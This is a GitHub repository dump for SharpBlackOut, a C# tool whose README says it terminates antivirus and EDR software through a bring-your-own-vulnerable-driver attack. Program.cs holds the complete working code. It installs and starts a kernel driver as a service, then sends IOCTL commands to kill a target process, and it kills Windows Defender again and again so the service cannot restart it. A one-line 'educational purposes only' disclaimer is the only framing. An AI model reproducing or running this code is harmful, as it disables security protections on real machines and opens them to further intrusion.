├── README.md ├── SharpBlackOut.sln └── SharpBlackOut ├── App.config ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── SharpBlackOut.csproj ├── bin └── Debug │ ├── SharpBlackOut.exe │ ├── SharpBlackOut.exe.config │ └── SharpBlackOut.pdb └── obj └── Debug ├── DesignTimeResolveAssemblyReferences.cache ├── DesignTimeResolveAssemblyReferencesInput.cache ├── SharpBlackOut.csproj.AssemblyReference.cache ├── SharpBlackOut.csproj.CoreCompileInputs.cache ├── SharpBlackOut.csproj.FileListAbsolute.txt ├── SharpBlackOut.csproj.SuggestedBindingRedirects.cache ├── SharpBlackOut.exe └── SharpBlackOut.pdb /README.md: -------------------------------------------------------------------------------- 1 | # SharpBlackout 2 | Terminate AV/EDR leveraging BYOVD attack 3 | 4 | 5 | > Note: This project is for educational purposes only. 6 | 7 | Sharpblackout is an adaptation of the [@Blackout](https://github.com/ZeroMemoryEx/Blackout) project originally developed in C++ by [@ZeroMemoryEx](https://github.com/ZeroMemoryEx/Blackout), which consists of removing AV/EDRs using the gmer (BYOVD) driver. 8 | 9 | Just wanted to try making it in C# 10 | 11 | ❗️ **Important:** This requires Administrator privileges for it to work. 12 | 13 | ⚠️ **Warning:** This might be buggy and not work to keep Defender or other programs terminated. 14 | 15 | All credit to the original author @ZeroMemoryEx. 16 | 17 | 18 | ## Demo 19 | 20 | ![Sharpblackout](https://github.com/dmcxblue/SharpBlackout/assets/41899653/25f1baa9-d177-43b0-a389-5888c955a217) 21 | 22 | -------------------------------------------------------------------------------- /SharpBlackOut.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33829.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpBlackOut", "SharpBlackOut\SharpBlackOut.csproj", "{07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {F1CA1828-8368-4CDE-B59A-DACA872C3F5E} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /SharpBlackOut/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SharpBlackOut/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.Reflection; 5 | using System.Runtime.InteropServices; 6 | using System.Threading; 7 | 8 | class Program 9 | { 10 | // IOCTL codes 11 | const uint INITIALIZE_IOCTL_CODE = 0x9876C004; 12 | const uint TERMINSTE_PROCESS_IOCTL_CODE = 0x9876C094; 13 | 14 | // Service-related constants 15 | const uint SC_MANAGER_ALL_ACCESS = 0xF003F; 16 | const uint SERVICE_KERNEL_DRIVER = 0x00000001; 17 | const uint SERVICE_DEMAND_START = 0x00000003; 18 | const uint SERVICE_ERROR_IGNORE = 0x00000000; 19 | const uint SERVICE_ALL_ACCESS = 0xF01FF; 20 | 21 | // P/Invoke declarations for driver communication 22 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] 23 | static extern IntPtr CreateFile( 24 | string lpFileName, 25 | uint dwDesiredAccess, 26 | uint dwShareMode, 27 | IntPtr lpSecurityAttributes, 28 | uint dwCreationDisposition, 29 | uint dwFlagsAndAttributes, 30 | IntPtr hTemplateFile 31 | ); 32 | 33 | [DllImport("kernel32.dll", SetLastError = true)] 34 | static extern bool DeviceIoControl( 35 | IntPtr hDevice, 36 | uint dwIoControlCode, 37 | ref uint lpInBuffer, 38 | uint nInBufferSize, 39 | [Out] byte[] lpOutBuffer, 40 | uint nOutBufferSize, 41 | out uint lpBytesReturned, 42 | IntPtr lpOverlapped 43 | ); 44 | 45 | [DllImport("kernel32.dll", SetLastError = true)] 46 | static extern bool CloseHandle(IntPtr hObject); 47 | 48 | // P/Invoke declarations for service functions 49 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)] 50 | static extern IntPtr OpenSCManagerA( 51 | string lpMachineName, 52 | string lpDatabaseName, 53 | uint dwDesiredAccess 54 | ); 55 | 56 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)] 57 | static extern IntPtr OpenServiceA( 58 | IntPtr hSCManager, 59 | string lpServiceName, 60 | uint dwDesiredAccess 61 | ); 62 | 63 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)] 64 | static extern bool QueryServiceStatus( 65 | IntPtr hService, 66 | out SERVICE_STATUS lpServiceStatus 67 | ); 68 | 69 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)] 70 | static extern bool StartServiceA( 71 | IntPtr hService, 72 | uint dwNumServiceArgs, 73 | IntPtr lpServiceArgVectors 74 | ); 75 | 76 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)] 77 | static extern IntPtr CreateServiceA( 78 | IntPtr hSCManager, 79 | string lpServiceName, 80 | string lpDisplayName, 81 | uint dwDesiredAccess, 82 | uint dwServiceType, 83 | uint dwStartType, 84 | uint dwErrorControl, 85 | string lpBinaryPathName, 86 | string lpLoadOrderGroup, 87 | IntPtr lpdwTagId, 88 | string lpDependencies, 89 | string lpServiceStartName, 90 | string lpPassword 91 | ); 92 | 93 | [DllImport("advapi32.dll", SetLastError = true)] 94 | static extern bool CloseServiceHandle(IntPtr hSCObject); 95 | 96 | [StructLayout(LayoutKind.Sequential)] 97 | struct SERVICE_STATUS 98 | { 99 | public uint dwServiceType; 100 | public uint dwCurrentState; 101 | public uint dwControlsAccepted; 102 | public uint dwWin32ExitCode; 103 | public uint dwServiceSpecificExitCode; 104 | public uint dwCheckPoint; 105 | public uint dwWaitHint; 106 | } 107 | 108 | // Translated LoadDriver function. 109 | // It looks for an existing service named "Blackout". If found, it queries its status and starts it if stopped. 110 | // Otherwise, it creates the service using the provided full driver path and starts it. 111 | static bool LoadDriver(string driverPath) 112 | { 113 | const string serviceName = "Blackout"; 114 | 115 | // Open the Service Control Manager 116 | IntPtr hSCM = OpenSCManagerA(null, null, SC_MANAGER_ALL_ACCESS); 117 | if (hSCM == IntPtr.Zero) 118 | { 119 | Console.WriteLine("Failed to open Service Control Manager."); 120 | return false; 121 | } 122 | 123 | // Check if the service already exists 124 | IntPtr hService = OpenServiceA(hSCM, serviceName, SERVICE_ALL_ACCESS); 125 | if (hService != IntPtr.Zero) 126 | { 127 | Console.WriteLine("Service already exists."); 128 | 129 | // Query service status 130 | if (!QueryServiceStatus(hService, out SERVICE_STATUS status)) 131 | { 132 | Console.WriteLine("Failed to query service status."); 133 | CloseServiceHandle(hService); 134 | CloseServiceHandle(hSCM); 135 | return false; 136 | } 137 | 138 | // If service is stopped, start it (SERVICE_STOPPED == 1) 139 | if (status.dwCurrentState == 1) 140 | { 141 | if (!StartServiceA(hService, 0, IntPtr.Zero)) 142 | { 143 | Console.WriteLine("Failed to start service."); 144 | CloseServiceHandle(hService); 145 | CloseServiceHandle(hSCM); 146 | return false; 147 | } 148 | Console.WriteLine("Starting service..."); 149 | } 150 | 151 | CloseServiceHandle(hService); 152 | CloseServiceHandle(hSCM); 153 | return true; 154 | } 155 | 156 | // Service doesn't exist; create it. 157 | hService = CreateServiceA( 158 | hSCM, 159 | serviceName, 160 | serviceName, 161 | SERVICE_ALL_ACCESS, 162 | SERVICE_KERNEL_DRIVER, 163 | SERVICE_DEMAND_START, 164 | SERVICE_ERROR_IGNORE, 165 | driverPath, 166 | null, 167 | IntPtr.Zero, 168 | null, 169 | null, 170 | null 171 | ); 172 | 173 | if (hService == IntPtr.Zero) 174 | { 175 | Console.WriteLine("Failed to create service."); 176 | CloseServiceHandle(hSCM); 177 | return false; 178 | } 179 | 180 | Console.WriteLine("Service created successfully."); 181 | 182 | // Start the newly created service. 183 | if (!StartServiceA(hService, 0, IntPtr.Zero)) 184 | { 185 | Console.WriteLine("Failed to start service."); 186 | CloseServiceHandle(hService); 187 | CloseServiceHandle(hSCM); 188 | return false; 189 | } 190 | Console.WriteLine("Starting service..."); 191 | 192 | CloseServiceHandle(hService); 193 | CloseServiceHandle(hSCM); 194 | return true; 195 | } 196 | 197 | // CheckProcess returns true if a process with the given process ID exists. 198 | static bool CheckProcess(uint processId) 199 | { 200 | try 201 | { 202 | Process.GetProcessById((int)processId); 203 | return true; 204 | } 205 | catch 206 | { 207 | return false; 208 | } 209 | } 210 | 211 | // GetPID returns the process ID for the first process matching the given name. 212 | static uint GetPID(string processName) 213 | { 214 | Process[] processes = Process.GetProcessesByName(processName); 215 | if (processes.Length > 0) 216 | { 217 | return (uint)processes[0].Id; 218 | } 219 | return 0; 220 | } 221 | 222 | static void Main(string[] args) 223 | { 224 | // Validate command-line arguments. 225 | if (args.Length != 2 || args[0] != "-p") 226 | { 227 | Console.WriteLine("Invalid number of arguments. Usage: Blackout.exe -p "); 228 | return; 229 | } 230 | 231 | if (!uint.TryParse(args[1], out uint processId)) 232 | { 233 | Console.WriteLine("Invalid process id provided."); 234 | return; 235 | } 236 | 237 | if (!CheckProcess(processId)) 238 | { 239 | Console.WriteLine("Provided process id doesn't exist!"); 240 | return; 241 | } 242 | 243 | // Locate the driver file ("Blackout.sys") in the current directory. 244 | string driverFile = "Blackout.sys"; 245 | if (!File.Exists(driverFile)) 246 | { 247 | Console.WriteLine("Driver file not found!"); 248 | return; 249 | } 250 | 251 | string fullDriverPath = Path.GetFullPath(driverFile); 252 | Console.WriteLine($"Driver path: {fullDriverPath}"); 253 | Console.WriteLine($"Loading {driverFile} driver .."); 254 | 255 | if (!LoadDriver(fullDriverPath)) 256 | { 257 | Console.WriteLine("Failed to load driver, try running the program as administrator!"); 258 | return; 259 | } 260 | Console.WriteLine("Driver loaded successfully!"); 261 | 262 | // Open a handle to the driver using its symbolic link. 263 | IntPtr hDevice = CreateFile(@"\\.\Blackout", 0xC0000000, 0, IntPtr.Zero, 3, 0, IntPtr.Zero); 264 | if (hDevice == IntPtr.Zero || hDevice == new IntPtr(-1)) 265 | { 266 | Console.WriteLine("Failed to open handle to driver!"); 267 | return; 268 | } 269 | 270 | // Send the INITIALIZE_IOCTL_CODE command with the process ID. 271 | uint input = processId; 272 | byte[] output = new byte[8]; // buffer for output (adjust size as needed) 273 | if (!DeviceIoControl(hDevice, INITIALIZE_IOCTL_CODE, ref input, (uint)Marshal.SizeOf(input), output, (uint)output.Length, out uint bytesReturned, IntPtr.Zero)) 274 | { 275 | Console.WriteLine($"Failed to send initializing request 0x{INITIALIZE_IOCTL_CODE:X}!"); 276 | CloseHandle(hDevice); 277 | return; 278 | } 279 | Console.WriteLine($"Driver initialized 0x{INITIALIZE_IOCTL_CODE:X}!"); 280 | 281 | // If the target process ID matches Windows Defender's process, repeatedly send termination IOCTL. 282 | uint defenderPid = GetPID("MsMpEng"); 283 | if (defenderPid == processId) 284 | { 285 | Console.WriteLine("Terminating Windows Defender .."); 286 | Console.WriteLine("Keep the program running to prevent the service from restarting it"); 287 | bool once = true; 288 | while (true) 289 | { 290 | input = GetPID("MsMpEng"); 291 | if (input != 0) 292 | { 293 | if (!DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, ref input, (uint)Marshal.SizeOf(input), output, (uint)output.Length, out bytesReturned, IntPtr.Zero)) 294 | { 295 | Console.WriteLine($"DeviceIoControl failed. Error: 0x{Marshal.GetLastWin32Error():X}"); 296 | break; 297 | } 298 | if (once) 299 | { 300 | Console.WriteLine("Defender Terminated .."); 301 | once = false; 302 | } 303 | } 304 | Thread.Sleep(700); 305 | } 306 | } 307 | 308 | Console.WriteLine("Terminating process .."); 309 | if (!DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, ref input, (uint)Marshal.SizeOf(input), output, (uint)output.Length, out bytesReturned, IntPtr.Zero)) 310 | { 311 | Console.WriteLine($"Failed to terminate process: 0x{Marshal.GetLastWin32Error():X}!"); 312 | } 313 | else 314 | { 315 | Console.WriteLine("Process has been terminated!"); 316 | } 317 | 318 | Console.WriteLine("Press any key to exit..."); 319 | Console.ReadKey(); 320 | CloseHandle(hDevice); 321 | } 322 | } 323 | -------------------------------------------------------------------------------- /SharpBlackOut/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpBlackOut")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpBlackOut")] 13 | [assembly: AssemblyCopyright("Copyright © 2023")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("07dfc5aa-5b1f-4ccc-a3d3-816eccbb6cb6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpBlackOut/SharpBlackOut.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6} 8 | Exe 9 | SharpBlackOut 10 | SharpBlackOut 11 | v4.8 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /SharpBlackOut/bin/Debug/SharpBlackOut.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/bin/Debug/SharpBlackOut.exe -------------------------------------------------------------------------------- /SharpBlackOut/bin/Debug/SharpBlackOut.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SharpBlackOut/bin/Debug/SharpBlackOut.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/bin/Debug/SharpBlackOut.pdb -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a8325433ab15581c23fd6c99708ef44d7c5812d7 2 | -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\RedTeam\SharpBlackOut\SharpBlackOut\bin\Debug\SharpBlackOut.exe.config 2 | C:\RedTeam\SharpBlackOut\SharpBlackOut\bin\Debug\SharpBlackOut.exe 3 | C:\RedTeam\SharpBlackOut\SharpBlackOut\bin\Debug\SharpBlackOut.pdb 4 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.csproj.AssemblyReference.cache 5 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.csproj.SuggestedBindingRedirects.cache 6 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.csproj.CoreCompileInputs.cache 7 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.exe 8 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.pdb 9 | -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.csproj.SuggestedBindingRedirects.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.exe -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.pdb --------------------------------------------------------------------------------